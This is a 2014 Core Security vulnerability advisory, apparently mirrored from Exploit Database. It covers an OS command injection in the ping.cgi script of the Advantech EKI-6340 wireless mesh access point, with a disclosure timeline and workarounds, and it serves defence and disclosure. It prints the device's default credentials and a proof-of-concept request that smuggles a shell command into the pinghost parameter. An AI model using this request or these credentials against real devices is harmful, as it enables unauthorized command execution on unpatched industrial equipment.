Advantech EKI-6340 – Command Injection

• Exploit Database
• 21 阅读

• 作者： Core Security
  日期： 2014-11-24
• 类别：

  • webapps
  平台：

  • cgi
• 来源：https://www.exploit-db.com/exploits/35357/

• Core Security - Corelabs Advisory
  http://corelabs.coresecurity.com/
  
  Advantech EKI-6340 Command Injection
  
  
  1. *Advisory Information*
  
  Title: Advantech EKI-6340 Command Injection
  Advisory ID: CORE-2014-0009
  Advisory URL:
  http://www.coresecurity.com/advisories/advantech-eki-6340-command-injection
  Date published: 2014-11-19
  Date of last update: 2014-11-19
  Vendors contacted: Advantech
  Release mode: User release
  
  
  2. *Vulnerability Information*
  
  Class: OS Command Injection [CWE-78]
  Impact: Code execution
  Remotely Exploitable: Yes
  Locally Exploitable: No
  CVE Name: CVE-2014-8387
  
  
  3. *Vulnerability Description*
  
  
  The Advantech EKI-6340 [1] series are wireless Mesh AP for outdoor
  deployment. With self-healing and self-forming capabilities, the
  wireless network is free from interruption even part of Mesh nodes
  failed. It's especially critical to infrastructures where wired
  solutions are hard to deploy. This Mesh network covers growing rich data
  demands such as video security, surveillance and entertainment.
  
  Advantech EKI-6340 series is vulnerable to a OS Command Injection,
  which can be exploited by remote attackers to execute arbitrary code and
  commands, by using a non privileged user against a vulnerable CGI file.
  
  
  4. *Vulnerable packages*
  
  
   . Advantech EKI-6340 V2.05
   . Other versions may probably be affected too, but they were not checked.
  
  
  5. *Vendor Information, Solutions and Workarounds*
  
  
  Considering that the vendor is not going to fix or update this
  device the following recommendations should be taken into consideration
  in case of using a vulnerable device:
  
  - Change the 'guest' user password (or delete the user in case
  is not used)
  - Edit the fshttpd.conf and remove the line
  'guest_allow=/cgi/ping.cgi'.
  - Check that the 'admin' user doesn't has the default password
  as well.
  
  
  6. *Credits*
  
  
  This vulnerability was discovered and researched by Facundo Pantaleo
  and Flavio Cangini from Core Security Engineering Team. The publication
  of this advisory was coordinated by Joaquín Rodríguez Varela from Core
  Advisories Team.
  
  
  7. *Technical Description / Proof of Concept Code*
  
  
  This vulnerability is caused by an incorrect sanitization of the
  input parameters of the file "ping.cgi" that is a symbolic link of
  "utility.cgi".
  It allows to concatenate commands after the IP direction parameter,
  therefore enabling a user to inject OS commands. The "call_ping"
  function inside the file "/usr/webui/webroot/cgi/utility.cgi" is where
  the vulnerability lays.
  
  The CGI file requieres authentication, but the "admin" user is not
  the only one allowed to execute it. Based on the webservers default
  configuration file, the "guest" has permissons over it as well. This
  user is rarely disbled and its password tends to remain unchanged. This
  default credentials are username "user" and password "user" as well.
  Below is an example of the webserver (based on Mongoose webserver [2])
  default configuration file "fshttpd.conf":
  
  
  /-----
   
  listening_ports=80,443s
  user_admin=admin
  pass_admin=admin
  user_guest=user
  pass_guest=user
  document_root=/usr/webui/webroot
  authorize_uri=/authorize
  unauthorize_uri=/unauthorize
  login_uri=/login.html
  logout_uri=/logout.html
  login_fail_uri=/err/login_fail.html
  sessions_full_uri=/err/nosessions.html
  no_redirect_uri=/cgi/fwupstatus.cgi
  guest_allow=/admin/FWUPStatus.html
  guest_allow=/status/*
  guest_allow=/utility/Ping.html
  guest_allow=/utility/RssiCalc.html
  guest_allow=/utility/FresnelZone.html
  guest_allow=/cgi/ping.cgi
  guest_allow=/cgi/status_query.cgi
  guest_allow=/cgi/nodeinfo_query_MAC.cgi
  guest_allow=/cgi/nodeinfo_query.cgi
  guest_allow=/cgi/nodeinfo_query_AP.cgi
  guest_allow=/cgi/fwupstatus.cgi
  nologin_allow=/
  nologin_allow=/index.*
  nologin_allow=/css/*
  nologin_allow=/template/*
  nologin_allow=/images/*
  nologin_allow=/images/dhtmlxcalendar_dhx_skyblue/*
  nologin_allow=/js/*
  nologin_allow=/favicon.ico
  nologin_allow=/err/*
  
  -----/
  
  
  7.1. *Proof of Concept*
  
  
  /-----
   
  
   
  http://localhost:80/cgi/ping.cgi?pinghost=127.0.0.1;sleep%2010&pingsize=3
   
  When requested for credentials use the following:
   
  User: user
  Password: user
  
  
  -----/
  
  
  8. *Report Timeline*
  
  . 2014-10-01:
  
  Initial notification sent to ICS-CERT informing of the vulnerability
  and requesting the vendor's contact information.
  
  . 2014-10-01:
  
  ICS-CERT informs that they will ask the vendor if they want to
  coordinate directly with us or if they prefer to have ICS-CERT mediate.
  They request the vulnerability report.
  
  . 2014-10-01:
  
  ICS-CERT informs that the vendor answered that they would like the
  ICS-CERT to mediate the coordination of the advisory. They requested
  again the vulnerability report.
  
  . 2014-10-01:
  
  We send the vulnerability detail, including technical description
  and a PoC.
   
  . 2014-10-09:
  
  We request a status update on the reported vulnerability.
  
  . 2014-10-20:
  
  ICS-CERT informs that the vendor plans to discontinue EKI-6340 early
  next year and therefore they will not fix it.
  
  . 2014-11-13:
  
  We inform them that we will publish this advisory as user release on
  Wednesday 19th of November.
  
  . 2014-11-19:
  
  Advisory CORE-2014-0009 published.
  
  
  9. *References*
  
  [1]
  http://www.advantech.com.tw/products/56bfcf50-1ada-4ac6-aaf5-4e726ebad002/EKI-6340/mod_04f43dee-f991-44f1-aa1b-bbb1b30f2a72.aspx.
  
  [2] https://code.google.com/p/mongoose/.
  
  
  10. *About CoreLabs*
  
  CoreLabs, the research center of Core Security, is charged with
  anticipating the future needs and requirements for information security
  technologies. We conduct our research in several important areas of
  computer security including system vulnerabilities, cyber attack
  planning and simulation, source code auditing, and cryptography. Our
  results include problem formalization, identification of
  vulnerabilities, novel solutions and prototypes for new technologies.
  CoreLabs regularly publishes security advisories, technical papers,
  project information and shared software tools for public use at:
  http://corelabs.coresecurity.com.
  
  
  11. *About Core Security*
  
  
  Core Security enables organizations to get ahead of threats with
  security test and measurement solutions that continuously identify
  and demonstrate real-world exposures to their most critical assets. Our
  customers can gain real visibility into their security standing, real
  validation of their security controls, and real metrics to more
  effectively secure their organizations.
  
  Core Security's software solutions build on over a decade of trusted
  research and leading-edge threat expertise from the company's Security
  Consulting Services, CoreLabs and Engineering groups. Core Security can
  be reached at +1 (617) 399-6980 or on the Web at:
  http://www.coresecurity.com.
  
  
  12. *Disclaimer*
  
  The contents of this advisory are copyright (c) 2014 Core Security
  and (c) 2014 CoreLabs, and are licensed under a Creative Commons
  Attribution Non-Commercial Share-Alike 3.0 (United States) License:
  http://creativecommons.org/licenses/by-nc-sa/3.0/us/
  
  
  13. *PGP/GPG Keys*
  
  
  This advisory has been signed with the GPG key of Core Security
  advisories team, which is available for download at
  http://www.coresecurity.com/files/attachments/core_security_advisories.asc.